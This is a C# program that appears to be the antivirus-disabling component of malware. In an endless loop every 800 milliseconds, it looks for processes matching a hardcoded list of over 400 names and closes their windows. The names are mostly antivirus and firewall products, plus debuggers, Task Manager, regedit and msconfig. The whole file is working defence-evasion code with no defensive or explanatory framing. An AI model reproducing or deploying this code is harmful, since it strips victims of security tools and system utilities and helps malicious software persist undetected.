using System;
using System.Diagnostics;
using System.Threading;

namespace test;

internal static class Program
{
	[STAThread]
	private static void Main()
	{
		for (int i = 10; i >= 5; i++)
		{
			Thread.Sleep(800);
			try
			{
				string[] array = new string[424]
				{
					"ACKWIN32", "ADAWARE", "ADVXDWIN", "AGENTSVR", "AGENTW ", "ALERTSVC", "ALEVIR", "ALOGSERV", "AMON9X ", "ANTI-TROJAN",
					"ANTIVIRUS ", "ANTS ", "APIMONITOR", "APLICA32 ", "APVXDWIN ", "ARR ", "ATCON", "ATRO55EN", "ATUPDATER", "ATUPDATER ",
					"ATWATCH ", "AU ", "AUPDATE", "AUPDATE ", "AUTODOWN ", "AUTODOWN", "AUTOTRACE ", "AUTOTRACE ", "AUTOUPDATE ", "AUTOUPDATE ",
					"AVCONSOL ", "AVE32 ", "AVGCC32", "AVGCTRL", "AVGNT ", "AVGSERV", "AVGSERV9", "AVGW ", "AVKPOP", "AVKSERV",
					"AVKSERVICE", "AVKWCTl9 ", "AVLTMAIN ", "AVNT ", "AVP ", "AVP32", "AVPCC ", "AVPDOS32", "AVPM ", "AVPTC32",
					"AVPUPD ", "AVPUPD ", "AVSCHED32", "AVSYNMGR", "AVWINNT ", "AVWUPD ", "AVWUPD32", "AVWUPD32 ", "AVWUPSRV ", "AVXMONITOR9X",
					"AVXMONITORNT ", "AVXQUAR ", "AVXQUAR ", "BACKWEB ", "BARGAINS ", "BD_PROFESSIONAL", "BEAGLE", "BELT ", "BIDEF ", "BIDSERVER",
					"BIPCP", "BIPCPEVALSETUP ", "BISP", "BLACKD", "BLACKICE", "BLSS", "BOOTCONF", "BOOTWARN", "BORG2 ", "BPC ",
					"BRASIL", "BS120", "BUNDLE", "BVT ", "CCAPP", "CCEVTMGR", "CCPXYSVC ", "CDP ", "CFD", "CFGWIZ",
					"CFIADMIN", "CFIAUDIT", "CFINET", "CFINET32", "CLEAN", "CLEANER", "CLEANER3", "CLEANPC ", "CLICK ", "CMD32 ",
					"CMESYS ", "CMGRDIAN", "CMON016 ", "CONNECTIONMONITOR", "CPD ", "CPF9X206", "CPFNT206", "CTRL ", "CV ", "CWNB181",
					"CWNTDWMO ", "IEXPLORER", "IFACE ", "IFW2000", "INETLNFO", "INFUS ", "INFWIN", "INIT ", "INTDEL", "INTREN ",
					"IOMON98", "ISTSVC ", "JAMMER ", "JDBGMRG ", "JEDI ", "KAVLITE40ENG ", "KAVPERS40ENG ", "KAVPF ", "KAZZA", "KEENVALUE",
					"KERIO-PF-213-EN-WIN", "KERIO-WRL-421-EN-WIN", "KERIO-WRP-421-EN-WIN", "KERNEL32", "KILLPROCESSSETUP161", "LAUNCHER", "LDNETMON ", "LDPRO ", "LDPROMENU", "LDSCAN",
					"LNETINFO", "LOADER ", "LOCALNET", "LOCKDOWN", "LOCKDOWN2000", "LOOKOUT ", "LORDPE ", "LSETUP", "LUALL ", "LUAU ",
					"LUCOMSERVER ", "LUINIT ", "LUSPT", "MAPISVC32", "MCAGENT ", "MCMNHDLR ", "MCSHIELD ", "MCTOOL ", "MCUPDATE", "MCUPDATE ",
					"MCVSRTE", "MCVSSHLD ", "MD ", "MFIN32", "MFW2EN ", "MFWENG3.02D30 ", "MGAVRTCL ", "MGAVRTE ", "MGHTML", "MGUI ",
					"MINILOG", "MMOD", "MONITOR", "MOOLIVE", "MOSTAT ", "MPFAGENT ", "MPFSERVICE ", "MPFTRAY ", "MRFLUX", "MSAPP ",
					"MSBB ", "MSBLAST", "MSCACHE ", "MSCCN32 ", "MSCMAN ", "MSCONFIG", "MSDM ", "MSDOS", "MSIEXEC16", "MSINFO32",
					"MSLAUGH ", "MSMGT ", "MSMSGRI32", "MSSMMC32", "MSSYS ", "MSVXD", "MU0311AD", "MWATCH ", "N32SCANW", "NAV ",
					"AUTO-PROTECT.NAV80TRY", "NAVAP.NAVAPSVC", "NAVAPSVC ", "NAVAPW32", "NAVDX ", "NAVLU32", "NAVNT ", "NAVSTUB ", "NAVW32", "NAVWNT",
					"NC2000 ", "NCINST4", "NDD32 ", "NEOMONITOR ", "NEOWATCHLOG ", "NETARMOR ", "NETD32 ", "NETINFO", "NETMON", "NETSCANPRO",
					"NETSPYHUNTER-1.2", "NETSTAT ", "NETUTILS", "NISSERV ", "NISUM ", "NMAIN ", "NOD32 ", "NORMIST", "NORTON_INTERNET_SECU_3.0_407", "NOTSTART",
					"NPF40_TW_98_NT_ME_2K", "NPFMESSENGER ", "NPROTECT", "NPSCHECK", "NPSSVC ", "NSCHED32", "NSSYS32", "NSTASK32", "NSUPDATE", "NT",
					"NTRTSCAN", "NTVDM", "NTXconfig", "NUI", "NUPGRADE", "NUPGRADE", "NVARCH16", "NVC95", "NVSVC32", "NWINST4",
					"NWSERVICE", "NWTOOL16", "OLLYDBG", "ONSRVR", "OPTIMIZE", "OSTRONET", "OTFIX", "OUTPOST", "OUTPOST", "OUTPOSTINSTALL",
					"OUTPOSTPROINSTALL", "PADMIN", "PANIXK", "PATCH", "PAVCL", "PAVPROXY", "PAVSCHED", "PAVW", "PCFWALLICON", "PCIP10117_0",
					"PCSCAN", "PDSETUP", "PERISCOPE", "PERSFW", "PERSWF", "PF2", "PFWADMIN", "PGMONITR", "PINGSCAN", "PLATIN",
					"POP3TRAP", "POPROXY", "POPSCAN", "PORTDETECTIVE", "PORTMONITOR", "POWERSCAN", "PPINUPDT", "PPTBC", "PPVSTOP", "PRIZESURFER",
					"PRMT", "PRMVR", "PROCDUMP", "PROCESSMONITOR", "PROCEXPLORERV1.0", "PROGRAMAUDITOR", "PROPORT", "PROTECTX ", "PSPF", "PURGE",
					"QCONSOLE", "QSERVER", "RAPAPP", "RAV7", "RAV7WIN", "RAV8WIN32ENG", "RAY", "RB32", "RCSYNC", "REALMON",
					"REGED", "REGEDIT", "REGEDT32", "RESCUE", "RESCUE32", "RRGUARD", "RSHELL", "RTVSCAN", "RTVSCN95", "RULAUNCH",
					"RUN32DLL", "RUNDLL", "RUNDLL16", "RUXDLL32", "SAFEWEB", "SAHAGENT ", "SAVE", "SAVENOW", "SBSERV", "SC",
					"SCAM32", "SCAN32", "SCAN95", "SCANPM", "SCRSCAN", "SETUPVAMEEVAL", "SETUP_FLOWPROTECTOR_US", "SFC", "SGSSFW32", "SH",
					"SHELLSPYINSTALL", "SHN", "SHOWBEHIND", "SMC", "SMS", "SMSS32", "SOAP", "SOFI", "SPERM", "SPF",
					"SPHINX", "SPOLER", "SPOOLCV", "SPOOLSV32", "SPYXX", "SREXE", "SRNG", "SS3EDIT", "SSGRATE", "SSG_4104",
					"ST2", "START", "STCLOADER", "SUPFTRL", "SUPPORT", "SUPPORTER5", "SVC", "SVCHOSTC", "SVCHOSTS", "SVSHOST",
					"SWEEP95 ", "SWEEPNET.SWEEPSRV.SYS.SWNETSUP", "SYMPROXYSVC", "SYMTRAY", "SYSEDIT ", "SYSTEM", "SYSTEM32", "SYSUPD", "TASKMG", "TASKMO",
					"TASKMON", "TAUMON", "TBSCAN", "TC", "TCA", "TCM", "TDS-3", "TDS2-NT", "TEEKIDS", "TFAK",
					"TFAK5", "TGBOB", "TITANIN", "TITANINXP", "TRACERT", "TRICKLER", "TRJSCAN", "TRJSETUP", "TROJANTRAP3", "TSADBOT",
					"TVMD", "TVTMD", "UNDOBOOT", "UPDAT", "UPDATE", "UPDATE", "UPGRAD", "UTPOST", "VBCMSERV", "VBCONS",
					"VBUST ", "VBWIN9X", "VBWINNTW", "VCSETUP", "VET32 ", "VET95", "vb6", "taskmgr", "regedit", "notepad",
					"install", "setup", "MpfConsole", "AmIrCiViL"
				};
				string[] array2 = array;
				foreach (string processName in array2)
				{
					try
					{
						Process[] processesByName = Process.GetProcessesByName(processName);
						Process[] array3 = processesByName;
						foreach (Process process in array3)
						{
							process.CloseMainWindow();
						}
					}
					catch (Exception)
					{
					}
				}
			}
			catch (Exception)
			{
			}
		}
	}
}
